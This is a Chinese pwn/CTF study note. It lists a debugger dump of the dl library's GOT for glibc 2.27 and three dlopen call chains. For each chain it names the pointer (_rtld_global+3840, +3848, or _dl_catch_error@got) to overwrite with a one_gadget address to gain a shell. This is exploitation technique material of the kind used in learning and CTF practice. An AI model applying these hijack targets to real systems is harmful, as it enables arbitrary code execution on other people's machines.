【Pwn 笔记】dl 调用链汇总

dl 中的 got 表

示例 libc：libc6_2.27-3ubuntu1_amd64.so

0x7f9587ed2000 (_GLOBAL_OFFSET_TABLE_) ← 0x202d90
0x7f9587ed2008 (_GLOBAL_OFFSET_TABLE_+8) → 0x7f95880d1000 → 0x7f9587ccf000 ← jg     0x7f9587ccf047
0x7f9587ed2010 (_GLOBAL_OFFSET_TABLE_+16) → 0x7f9587eea750 (_dl_runtime_resolve_xsavec) ← push   rbx
0x7f9587ed2018 (_GLOBAL_OFFSET_TABLE_+24) → 0x7f9587ccfd56 (__asprintf@plt+6) ← push   0 /* 'h' */
0x7f9587ed2020 (_GLOBAL_OFFSET_TABLE_+32) → 0x7f9587ccfd66 (free@plt+6) ← push   1
0x7f9587ed2028 (_GLOBAL_OFFSET_TABLE_+40) → 0x7f9587ccfd76 (strcpy@plt+6) ← push   2
0x7f9587ed2030 (_GLOBAL_OFFSET_TABLE_+48) → 0x7f9587ccfd86 (__stack_chk_fail@plt+6) ← push   3
0x7f9587ed2038 (_GLOBAL_OFFSET_TABLE_+56) → 0x7f9587ccfd96 (_dl_catch_error@plt+6) ← push   4
0x7f9587ed2040 (_GLOBAL_OFFSET_TABLE_+64) → 0x7f9587ccfda6 (calloc@plt+6) ← push   5
0x7f9587ed2048 (_GLOBAL_OFFSET_TABLE_+72) → 0x7f9587ccfdb6 (__dcgettext@plt+6) ← push   6
0x7f9587ed2050 (_GLOBAL_OFFSET_TABLE_+80) → 0x7f9587ccfdc6 (_dl_signal_error@plt+6) ← push   7
0x7f9587ed2058 (_GLOBAL_OFFSET_TABLE_+88) → 0x7f9587ccfdd6 (_dl_vsym@plt+6) ← push   8
0x7f9587ed2060 (_GLOBAL_OFFSET_TABLE_+96) → 0x7f9587ccfde6 (_dl_addr@plt+6) ← push   9 /* 'h\t' */
0x7f9587ed2068 (_GLOBAL_OFFSET_TABLE_+104) → 0x7f9587ccfdf6 (_dl_sym@plt+6) ← push   0xa /* 'h\n' */
0x7f9587ed2070 (_GLOBAL_OFFSET_TABLE_+112) → 0x7f9587ccfe06 (_dl_rtld_di_serinfo@plt+6) ← push   0xb /* 'h\x0b' */
0x7f9587ed2078 (_GLOBAL_OFFSET_TABLE_+120) → 0x7f9587ccfe16 (strerror@plt+6) ← push   0xc /* 'h\x0c' */
0x7f9587ed2080 (__dso_handle) ← 0x7f9587ed2080
0x7f9587ed2088 ← 0x0
0x7f9587ed2090 ← 0x0
0x7f9587ed2098 ← 0x0
0x7f9587ed20a0 (completed) ← 0x0
0x7f9587ed20a8 ← 0x0
0x7f9587ed20b0 ← 0x0
0x7f9587ed20b8 ← 0x0
0x7f9587ed20c0 (_dlfcn_hook) ← 0x0
0x7f9587ed20c8 (once) ← 0x0
0x7f9587ed20d0 (static_buf) ← 0x0
0x7f9587ed20d8 ← 0x0
0x7f9587ed20e0 (last_result) ← 0x0
0x7f9587ed20e8 (last_result+8) ← 0x0
0x7f9587ed20f0 (last_result+16) ← 0x0
0x7f9587ed20f8 (last_result+24) ← 0x0
0x7f9587ed2100 (__dlfcn_argv) → 0x7ffe4b070368 → 0x7ffe4b07228d ← 0x6c6c6168632f2e /* './chall' */
0x7f9587ed2108 (__dlfcn_argc) ← 0x1

dlopen 函数调用链

示例 libc：libc6_2.27-3ubuntu1_amd64.so

链Ⅰ

dlopen+108
_dlerror_run+96
_dl_catch_error+42
_dl_catch_exception+109
dlopen_doit+111
_dl_open+60
_rtld_global+3840

将地址 _rtld_global+3840 上的值改为 addr_one_gadget 即可提权

链Ⅱ

dlopen+108
_dlerror_run+96
_dl_catch_error+42
_dl_catch_exception+109
dlopen_doit+111
_dl_open+236
_rtld_global+3848

将地址 _rtld_global+3848 上的值改为 addr_one_gadget 即可提权

链Ⅲ

dlopen+108
_dlerror_run+96
_dl_catch_error@plt

将地址 _dl_catch_error@got 上的值改为 addr_one_gadget 即可提权